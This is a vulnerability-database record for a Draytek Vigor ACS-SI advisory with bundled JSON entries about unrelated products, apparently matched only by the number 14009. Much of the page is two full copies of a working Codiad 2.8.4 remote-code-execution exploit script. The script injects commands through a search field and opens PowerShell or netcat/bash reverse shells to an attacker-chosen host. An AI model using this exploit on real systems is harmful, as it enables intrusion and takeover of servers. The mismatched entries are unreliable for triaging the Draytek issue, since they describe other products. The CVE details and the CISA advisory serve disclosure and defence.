ID SECURITYVULNS:VULN:14009
Type securityvulns
Reporter BUGTRAQ
Modified 2014-10-14T00:00:00
Description
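Default account, unauthorized access, directory traversal in Draytek Vigor ACS-SI. The record itself lists no CVE (its cvelist is empty); the CVE, exploit and advisory entries attached below describe other products (Codiad, Qualcomm Snapdragon firmware, ProMinent MultiFLEX M10a) and appear to be linked only through the shared number 14009, so they should not be used to triage this advisory.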
{"id": "SECURITYVULNS:VULN:14009", "bulletinFamily": "software", "title": "Draytek Vigor ACS-SI multiple security vulnerabilities", "description": "Default account, unauthorized access, directory traversal.", "published": "2014-10-14T00:00:00", "modified": "2014-10-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14009", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31177", "https://vulners.com/securityvulns/securityvulns:doc:31175"], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:09:57", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-08-31T11:09:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-14009"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1489.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201446", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31175", "SECURITYVULNS:DOC:31177"]}], "modified": "2018-08-31T11:09:57", "rev": 2}, "vulnersScore": 5.9}, "affectedSoftware": [{"name": "Vigor", "operator": "eq", "version": "2130"}, {"name": "VigorACS SI", "operator": "eq", "version": "1.3"}], "immutableFields": []}
{"packetstorm": [{"lastseen": "2021-03-24T14:45:00", "description": "", "published": "2021-03-24T00:00:00", "type": "packetstorm", "title": "Codiad 2.8.4 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14009"], "modified": "2021-03-24T00:00:00", "id": "PACKETSTORM:161944", "href": "https://packetstormsecurity.com/files/161944/Codiad-2.8.4-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) \n# Discovery by: WangYihang \n# Vendor Homepage: http://codiad.com/ \n# Software Links : https://github.com/Codiad/Codiad/releases \n# Tested Version: Version: 2.8.4 \n# CVE: CVE-2018-14009 \n \n \n#!/usr/bin/env python \n# encoding: utf-8 \nimport requests \nimport sys \nimport json \nimport base64 \nsession = requests.Session() \ndef login(domain, username, password): \nglobal session \nurl = domain + \"/components/user/controller.php?action=authenticate\" \ndata = { \n\"username\": username, \n\"password\": password, \n\"theme\": \"default\", \n\"language\": \"en\" \n} \nresponse = session.post(url, data=data, verify=False) \ncontent = response.text \nprint(\"[+] Login Content : %s\" % (content)) \nif 'status\":\"success\"' in content: \nreturn True \ndef get_write_able_path(domain): \nglobal session \nurl = domain + \"/components/project/controller.php?action=get_current\" \nresponse = session.get(url, verify=False) \ncontent = response.text \nprint(\"[+] Path Content : %s\" % (content)) \njson_obj = json.loads(content) \nif json_obj['status'] == \"success\": \nreturn json_obj['data']['path'] \nelse: \nreturn False \ndef base64_encode_2_bytes(host, port): \npayload = ''' \n$client = New-Object System.Net.Sockets.TCPClient(\"__HOST__\",__PORT__); \n$stream = $client.GetStream(); \n[byte[]]$bytes = 0..255|%{0}; \nwhile(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ \n$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); \n$sendback = (iex $data 2>&1 | 
Out-String ); \n$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \"; \n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); \n$stream.Write($sendbyte,0,$sendbyte.Length); \n$stream.Flush(); \n} \n$client.Close(); \n''' \nresult = \"\" \nfor i in payload.replace(\"__HOST__\", host).replace(\"__PORT__\", str(port)): \nresult += i + \"\\x00\" \nreturn base64.b64encode(result.encode()).decode().replace(\"\\n\", \"\") \ndef build_powershell_payload(host, port): \npreffix = \"powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc \" \nreturn preffix + base64_encode_2_bytes(host, port).replace(\"+\", \"%2b\") \ndef exploit(domain, username, password, host, port, path, platform): \nglobal session \nurl = domain + \\ \n\"components/filemanager/controller.php?type=1&action=search&path=%s\" % ( \npath) \nif platform.lower().startswith(\"win\"): \n# new version escapeshellarg \n# escapeshellarg on windows will quote the arg with \"\" \n# so we need to try twice \npayload = '||%s||' % (build_powershell_payload(host, port)) \npayload = \"search_string=Hacker&search_file_type=\" + payload \nheaders = { \n\"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"} \nresponse = session.post(url, data=payload, headers=headers, verify=False) \ncontent = response.text \nprint(content) \n# old version escapeshellarg \npayload = '%%22||%s||' % (build_powershell_payload(host, port)) \npayload = \"search_string=Hacker&search_file_type=\" + payload \nheaders = { \n\"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"} \nresponse = session.post(url, data=payload, headers=headers, verify=False) \ncontent = response.text \nprint(content) \nelse: \n# payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ''' \npayload = '\"%%0Anc %s %d|/bin/bash %%23' % (host, port) \npayload = \"search_string=Hacker&search_file_type=\" + payload \nheaders = { \n\"Content-Type\": 
\"application/x-www-form-urlencoded; charset=UTF-8\"} \nresponse = session.post(url, data=payload, headers=headers, verify=False) \ncontent = response.text \nprint(content) \ndef promote_yes(hint): \nprint(hint) \nwhile True: \nans = input(\"[Y/n] \").lower() \nif ans == 'n': \nreturn False \nelif ans == 'y': \nreturn True \nelse: \nprint(\"Incorrect input\") \ndef main(): \nif len(sys.argv) != 7: \nprint(\"Usage : \") \nprint(\" python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])) \nprint(\" python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])) \nprint(\"Example : \") \nprint(\" python %s http://localhost/ admin admin 8.8.8.8 8888 linux\" % (sys.argv[0])) \nprint(\" python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows\" % (sys.argv[0])) \nprint(\"Author : \") \nprint(\" WangYihang <wangyihanger@gmail.com>\") \nexit(1) \ndomain = sys.argv[1] \nusername = sys.argv[2] \npassword = sys.argv[3] \nhost = sys.argv[4] \nport = int(sys.argv[5]) \nplatform = sys.argv[6] \nif platform.lower().startswith(\"win\"): \nprint(\"[+] Please execute the following command on your vps: \") \nprint(\"nc -lnvp %d\" % (port)) \nif not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"): \nexit(1) \nelse: \nprint(\"[+] Please execute the following command on your vps: \") \nprint(\"echo 'bash -c \\\"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\\\"' | nc -lnvp %d\" % (host, port + 1, port)) \nprint(\"nc -lnvp %d\" % (port + 1)) \nif not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"): \nexit(1) \nprint(\"[+] Starting...\") \nif not login(domain, username, password): \nprint(\"[-] Login failed! 
Please check your username and password.\") \nexit(2) \nprint(\"[+] Login success!\") \nprint(\"[+] Getting writeable path...\") \npath = get_write_able_path(domain) \nif path == False: \nprint(\"[+] Get current path error!\") \nexit(3) \nprint(\"[+] Writeable Path : %s\" % (path)) \nprint(\"[+] Sending payload...\") \nexploit(domain, username, password, host, port, path, platform) \nprint(\"[+] Exploit finished!\") \nprint(\"[+] Enjoy your reverse shell!\") \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161944/codiad284-exec.txt"}], "exploitdb": [{"lastseen": "2021-03-23T18:42:21", "description": "", "published": "2021-03-23T00:00:00", "type": "exploitdb", "title": "Codiad 2.8.4 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14009"], "modified": "2021-03-23T00:00:00", "id": "EDB-ID:49705", "href": "https://www.exploit-db.com/exploits/49705", "sourceData": "# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated)\r\n# Discovery by: WangYihang\r\n# Vendor Homepage: http://codiad.com/\r\n# Software Links : https://github.com/Codiad/Codiad/releases\r\n# Tested Version: Version: 2.8.4\r\n# CVE: CVE-2018-14009\r\n\r\n#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport requests\r\nimport sys\r\nimport json\r\n\r\nsession = requests.Session()\r\n\r\n\r\ndef login(domain, username, password):\r\n global session\r\n url = domain + \"/components/user/controller.php?action=authenticate\"\r\n data = {\r\n \"username\": username,\r\n \"password\": password,\r\n \"theme\": \"default\",\r\n \"language\": \"en\"\r\n }\r\n response = session.post(url, data=data, verify=False)\r\n content = response.content\r\n print \"[+] Login Content : %s\" % (content)\r\n if 'status\":\"success\"' in content:\r\n return True\r\n\r\n\r\ndef get_write_able_path(domain):\r\n global session\r\n url = domain + 
\"/components/project/controller.php?action=get_current\"\r\n response = session.get(url, verify=False)\r\n content = response.content\r\n print \"[+] Path Content : %s\" % (content)\r\n json_obj = json.loads(content)\r\n if json_obj['status'] == \"success\":\r\n return json_obj['data']['path']\r\n else:\r\n return False\r\n\r\n\r\ndef base64_encode_2_bytes(host, port):\r\n payload = '''\r\n $client = New-Object System.Net.Sockets.TCPClient(\"__HOST__\",__PORT__);\r\n $stream = $client.GetStream();\r\n [byte[]]$bytes = 0..255|%{0};\r\n while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){\r\n $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\r\n $sendback = (iex $data 2>&1 | Out-String );\r\n $sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";\r\n $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\r\n $stream.Write($sendbyte,0,$sendbyte.Length);\r\n $stream.Flush();\r\n }\r\n $client.Close();\r\n '''\r\n result = \"\"\r\n for i in payload.replace(\"__HOST__\", host).replace(\"__PORT__\", str(port)):\r\n result += i + \"\\x00\"\r\n return result.encode(\"base64\").replace(\"\\n\", \"\")\r\n\r\n\r\ndef build_powershell_payload(host, port):\r\n preffix = \"powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc \"\r\n return preffix + base64_encode_2_bytes(host, port).replace(\"+\", \"%2b\")\r\n\r\n\r\ndef exploit(domain, username, password, host, port, path, platform):\r\n global session\r\n url = domain + \\\r\n \"components/filemanager/controller.php?type=1&action=search&path=%s\" % (\r\n path)\r\n if platform.lower().startswith(\"win\"):\r\n # new version escapeshellarg\r\n # escapeshellarg on windows will quote the arg with \"\"\r\n # so we need to try twice\r\n payload = '||%s||' % (build_powershell_payload(host, port))\r\n payload = \"search_string=Hacker&search_file_type=\" + payload\r\n headers = {\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"}\r\n response = 
session.post(url, data=payload, headers=headers, verify=False)\r\n content = response.content\r\n print content\r\n\r\n # old version escapeshellarg\r\n payload = '%%22||%s||' % (build_powershell_payload(host, port))\r\n payload = \"search_string=Hacker&search_file_type=\" + payload\r\n headers = {\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"}\r\n response = session.post(url, data=payload, headers=headers, verify=False)\r\n content = response.content\r\n print content\r\n else:\r\n # payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ'''\r\n payload = '\"%%0Anc %s %d|/bin/bash %%23' % (host, port)\r\n payload = \"search_string=Hacker&search_file_type=\" + payload\r\n headers = {\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"}\r\n response = session.post(url, data=payload, headers=headers, verify=False)\r\n content = response.content\r\n print content\r\n\r\n\r\ndef promote_yes(hint):\r\n print hint\r\n while True:\r\n ans = raw_input(\"[Y/n] \").lower()\r\n if ans == 'n':\r\n return False\r\n elif ans == 'y':\r\n return True\r\n else:\r\n print \"Incorrect input\"\r\n\r\n\r\ndef main():\r\n if len(sys.argv) != 7:\r\n print \"Usage : \"\r\n print \" python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])\r\n print \" python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])\r\n print \"Example : \"\r\n print \" python %s http://localhost/ admin admin 8.8.8.8 8888 linux\" % (sys.argv[0])\r\n print \" python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows\" % (sys.argv[0])\r\n print \"Author : \"\r\n print \" WangYihang <wangyihanger@gmail.com>\"\r\n exit(1)\r\n domain = sys.argv[1]\r\n username = sys.argv[2]\r\n password = sys.argv[3]\r\n host = sys.argv[4]\r\n port = int(sys.argv[5])\r\n platform = sys.argv[6]\r\n if platform.lower().startswith(\"win\"):\r\n print 
\"[+] Please execute the following command on your vps: \"\r\n print \"nc -lnvp %d\" % (port)\r\n if not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"):\r\n exit(1)\r\n else:\r\n print \"[+] Please execute the following command on your vps: \"\r\n print \"echo 'bash -c \\\"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\\\"' | nc -lnvp %d\" % (host, port + 1, port)\r\n print \"nc -lnvp %d\" % (port + 1)\r\n if not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"):\r\n exit(1)\r\n print \"[+] Starting...\"\r\n if not login(domain, username, password):\r\n print \"[-] Login failed! Please check your username and password.\"\r\n exit(2)\r\n print \"[+] Login success!\"\r\n print \"[+] Getting writeable path...\"\r\n path = get_write_able_path(domain)\r\n if path == False:\r\n print \"[+] Get current path error!\"\r\n exit(3)\r\n print \"[+] Writeable Path : %s\" % (path)\r\n print \"[+] Sending payload...\"\r\n exploit(domain, username, password, host, port, path, platform)\r\n print \"[+] Exploit finished!\"\r\n print \"[+] Enjoy your reverse shell!\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49705"}], "cve": [{"lastseen": "2021-02-02T07:12:51", "description": "Out of bound memory access while processing TZ command handler due to improper input validation on response length received from user in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8098, MDM9150, MDM9607, MDM9650, MSM8905, MSM8909, MSM8998, SDA660, SDA845, SDM630, SDM636, SDM660, SDM845, SDM850, SXR2130", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-16T11:15:00", "title": "CVE-2019-14009", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14009"], "modified": "2020-04-22T14:17:00", "cpe": ["cpe:/o:qualcomm:sda660_firmware:-", "cpe:/o:qualcomm:msm8998_firmware:-", "cpe:/o:qualcomm:apq8098_firmware:-", "cpe:/o:qualcomm:sda845_firmware:-", "cpe:/o:qualcomm:sdm636_firmware:-", "cpe:/o:qualcomm:msm8909_firmware:-", "cpe:/o:qualcomm:sdm845_firmware:-", "cpe:/o:qualcomm:apq8009_firmware:-", "cpe:/o:qualcomm:sxr2130_firmware:-", "cpe:/o:qualcomm:sdm660_firmware:-", "cpe:/o:qualcomm:msm8905_firmware:-", "cpe:/o:qualcomm:mdm9150_firmware:-", "cpe:/o:qualcomm:mdm9607_firmware:-", "cpe:/o:qualcomm:sdm850_firmware:-", "cpe:/o:qualcomm:sdm630_firmware:-", "cpe:/o:qualcomm:mdm9650_firmware:-"], "id": "CVE-2019-14009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:qualcomm:mdm9650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sda845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm850_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:qualcomm:mdm9150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sda660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm636_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8909_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8098_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8905_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9607_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sxr2130_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-01T14:12:23", "description": "Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-12T16:29:00", "title": "CVE-2018-14009", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14009"], "modified": "2021-03-31T15:30:00", "cpe": ["cpe:/a:codiad:codiad:2.8.4"], "id": 
"CVE-2018-14009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14009", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:codiad:codiad:2.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "An Information Exposure issue was discovered in ProMinent MultiFLEX M10a Controller web interface. When an authenticated user uses the Change Password feature on the application, the current password for the user is specified in plaintext. This may allow an attacker who has been authenticated to gain access to the password.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-17T22:29:00", "title": "CVE-2017-14009", "type": "cve", "cwe": ["CWE-319"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14009"], "modified": "2019-10-09T23:23:00", "cpe": ["cpe:/o:prominent:multiflex_m10a_controller_firmware:*"], "id": "CVE-2017-14009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14009", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": 
["cpe:2.3:o:prominent:multiflex_m10a_controller_firmware:*:*:*:*:*:*:*:*"]}], "ics": [{"lastseen": "2021-02-27T19:52:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-14005", "CVE-2017-14007", "CVE-2017-14009", "CVE-2017-14011", "CVE-2017-14013"], "description": "### **CVSS v3 8.8**\n\n**ATTENTION: **Remotely exploitable/low skill level to exploit.\n\n**Vendor:** ProMinent\n\n**Equipment:** MultiFLEX M10a Controller\n\n**Vulnerabilities:** Client-Side Enforcement of Server-Side Security, Insufficient Session Expiration, Cross-Site Request Forgery, Information Exposure, and Unverified Password Change\n\n## AFFECTED PRODUCTS\n\nThe following versions of MultiFLEX Controller, a water treatment controller, are affected:\n\n * All versions of MultiFLEX M10a Controller web interface.\n\n## IMPACT\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to bypass protection mechanisms, assume the identity of authenticated users, and change the device configuration.\n\n## MITIGATION\n\nProMinent has not provided mitigations for these vulnerabilities.\n\nNCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. 
Also recognize that a VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## VULNERABILITY OVERVIEW\n\n## [CLIENT-SIDE ENFORCEMENT OF SERVER-SIDE SECURITY CWE-602](<https://cwe.mitre.org/data/definitions/602.html>)\n\nThe log out function in the application removes the user\u2019s session only on the client side. This may allow an attacker to bypass protection mechanisms, gain privileges, or assume the identity of an authenticated user.\n\n[CVE-2017-14013](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14013>) has been assigned to this vulnerability. 
A CVSS v3 base score of 5.6 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n## [INSUFFICIENT SESSION EXPIRATION CWE-613](<https://cwe.mitre.org/data/definitions/613.html>)\n\nThe user\u2019s session is available for an extended period beyond the last activity, allowing an attacker to reuse an old session for authorization.\n\n[CVE-2017-14007](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14007>) has been assigned to this vulnerability. A CVSS v3 base score of 5.6 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n## [CROSS-SITE REQUEST FORGERY (CSRF) CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\nThe application does not sufficiently verify requests, making it susceptible to cross-site request forgery. This may allow an attacker to execute unauthorized code, resulting in changes to the configuration of the device.\n\n[CVE-2017-14011](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14011>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n## [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nWhen an authenticated user uses the \u201cChange Password\u201d feature on the application, the current password for the user is specified in plaintext. This may allow an attacker who has been authenticated to gain access to the password.\n\n[CVE-2017-14009](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14009>) has been assigned to this vulnerability. 
A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N>)).\n\n## [UNVERIFIED PASSWORD CHANGE CWE-620](<https://cwe.mitre.org/data/definitions/620.html>)\n\nWhen setting a new password for a user, the application does not require the user to know the original password. An attacker who is authenticated could change a user\u2019s password, enabling future access and possible configuration changes.\n\n[CVE-2017-14005](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14005>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n## RESEARCHER\n\nMaxim Rupp disclosed this vulnerability to ICS-CERT.\n\n## BACKGROUND\n\n**Critical Infrastructure Sector:** Water and Wastewater Systems\n\n**Countries/Areas Deployed:** Worldwide\n\n**Company Headquarters Location:** Ontario, California\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-17-285-01>); we'd welcome your feedback.\n", "modified": "2017-10-12T00:00:00", "published": "2017-10-12T00:00:00", "id": "ICSA-17-285-01", "href": "https://www.us-cert.gov/ics/advisories/ICSA-17-285-01", "type": "ics", "title": "ProMinent MultiFLEX M10a Controller", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hardlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": 